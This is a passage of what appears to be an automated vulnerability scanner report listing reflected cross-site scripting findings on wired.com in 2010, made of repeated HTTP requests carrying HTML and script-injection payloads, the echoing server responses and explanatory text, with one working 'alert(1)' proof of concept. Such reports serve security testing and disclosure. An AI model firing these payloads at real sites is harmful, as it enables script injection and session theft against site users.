GET /culture/lifestyle42d5a"><a>f39aa6a9d07/multimedia/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:36 GMT Date: Sun, 21 Nov 2010 23:06:36 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle42d5a"><a>f39aa6a9d07 c_multimedia"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31c8a"><a>c696540734e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/multimedia31c8a"><a>c696540734e/2008/11/gallery_vote HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29308 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:51 GMT Date: Sun, 21 Nov 2010 23:06:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_multimedia31c8a"><a>c696540734e"> ...[SNIP]...
1.532. http://www.wired.com/culture/lifestyle/multimedia/2008/11/gallery_vote [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26cdb"><script>alert(1)</script>0fe75b71068 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 200 OK Server: Apache/2.0.52 (Red Hat) Content-Language: en-US Content-Type: text/html; charset=UTF-8 Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:17 GMT Date: Sun, 21 Nov 2010 23:06:17 GMT Connection: close Connection: Transfer-Encoding Content-Length: 41448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xht ...[SNIP]... <a href="javascript: void(window.open('/print/culture/lifestyle/multimedia/2008/11/gallery_vote?26cdb"><script>alert(1)</script>0fe75b71068=1', 'printImage', 'height=800,width=1000,directories=no,location=no,menubar=no,resizable=yes,status=no,toolbar=no'))" id="printico" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 127a6"><a>a9774cc0e66 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture127a6"><a>a9774cc0e66/lifestyle/news/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:18 GMT Date: Sun, 21 Nov 2010 23:06:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture127a6"><a>a9774cc0e66 ss_lifestyle c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62a43"><a>9a2824aad23 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle62a43"><a>9a2824aad23/news/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:35 GMT Date: Sun, 21 Nov 2010 23:06:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle62a43"><a>9a2824aad23 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6c9a"><a>b4bd5c0f5f4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/newsf6c9a"><a>b4bd5c0f5f4/2005/01/66334 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:52 GMT Date: Sun, 21 Nov 2010 23:06:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_newsf6c9a"><a>b4bd5c0f5f4"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bee7"><a>1f9ffde2136 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture3bee7"><a>1f9ffde2136/lifestyle/news/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:22 GMT Date: Sun, 21 Nov 2010 23:06:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture3bee7"><a>1f9ffde2136 ss_lifestyle c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d26d"><a>83866788be7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle1d26d"><a>83866788be7/news/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:40 GMT Date: Sun, 21 Nov 2010 23:06:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle1d26d"><a>83866788be7 c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f1fee"><a>4d894af57f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /culture/lifestyle/newsf1fee"><a>4d894af57f2/2005/01/66359 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29289 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:04 GMT Date: Sun, 21 Nov 2010 23:07:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_culture ss_lifestyle c_newsf1fee"><a>4d894af57f2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 839c3"><a>d95b402d7c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /customerservice839c3"><a>d95b402d7c8 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29343 Vary: Accept-Encoding Cache-Control: max-age=224 Expires: Mon, 22 Nov 2010 01:13:02 GMT Date: Mon, 22 Nov 2010 01:09:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_customerservice839c3"><a>d95b402d7c8"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7ac8"><a>98e7490e5ae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainmenta7ac8"><a>98e7490e5ae HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29320 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Mon, 22 Nov 2010 01:14:45 GMT Date: Mon, 22 Nov 2010 01:10:45 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainmenta7ac8"><a>98e7490e5ae"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5df5b"><a>b5f8392314c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment5df5b"><a>b5f8392314c/ HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29321 Vary: Accept-Encoding Cache-Control: max-age=230 Expires: Sun, 21 Nov 2010 20:16:27 GMT Date: Sun, 21 Nov 2010 20:12:37 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment5df5b"><a>b5f8392314c"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94f82"><a>c6b1ca3f8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment94f82"><a>c6b1ca3f8f7/hollywood HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29343 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:30 GMT Date: Sun, 21 Nov 2010 23:07:30 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment94f82"><a>c6b1ca3f8f7 ss_hollywood"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5fc"><a>d3f7037435e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/hollywoodce5fc"><a>d3f7037435e HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29343 Vary: Accept-Encoding Cache-Control: max-age=574 Expires: Sun, 21 Nov 2010 23:17:52 GMT Date: Sun, 21 Nov 2010 23:08:18 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_hollywoodce5fc"><a>d3f7037435e"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 224ea"><a>7c815694db5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment224ea"><a>7c815694db5/music HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29335 Vary: Accept-Encoding Cache-Control: max-age=240 Expires: Sun, 21 Nov 2010 23:11:32 GMT Date: Sun, 21 Nov 2010 23:07:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment224ea"><a>7c815694db5 ss_music"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c9b2"><a>b28c0d05be9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music3c9b2"><a>b28c0d05be9 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29335 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:18:03 GMT Date: Sun, 21 Nov 2010 23:08:03 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_music3c9b2"><a>b28c0d05be9"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3385f"><a>f8dbe2114f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment3385f"><a>f8dbe2114f4/music/news/2004/04/63263 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:16:58 GMT Date: Sun, 21 Nov 2010 23:06:58 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment3385f"><a>f8dbe2114f4 ss_music c_news"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4db81"><a>8eb418e94bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /entertainment/music4db81"><a>8eb418e94bf/news/2004/04/63263 HTTP/1.1 Host: www.wired.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found Server: Apache/2.0.52 (Red Hat) Content-Type: text/html; charset=UTF-8 Content-Length: 29361 Vary: Accept-Encoding Cache-Control: max-age=600 Expires: Sun, 21 Nov 2010 23:17:21 GMT Date: Sun, 21 Nov 2010 23:07:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt ...[SNIP]... <body class="s_entertainment ss_music4db81"><a>8eb418e94bf c_news"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70d39"><a>b304160c724 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
